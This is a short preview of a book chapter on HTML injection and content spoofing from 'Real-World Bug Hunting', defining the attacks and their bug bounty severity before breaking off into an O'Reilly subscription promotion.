5HTML INJECTION AND CONTENT SPOOFING

Image

Hypertext Markup Language (HTML) injection and content spoofing are attacks that allow a malicious user to inject content into a site’s web pages. The attacker can inject HTML elements of their own design, most commonly as a <form> tag that mimics a legitimate login screen in order to trick targets into submitting sensitive information to a malicious site. Because these types of attacks rely on fooling targets (a practice sometimes called social engineering), bug bounty programs view content spoofing and HTML injection as less severe than other vulnerabilities covered in this book.

An HTML injection vulnerability ...

Get Real-World Bug Hunting now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.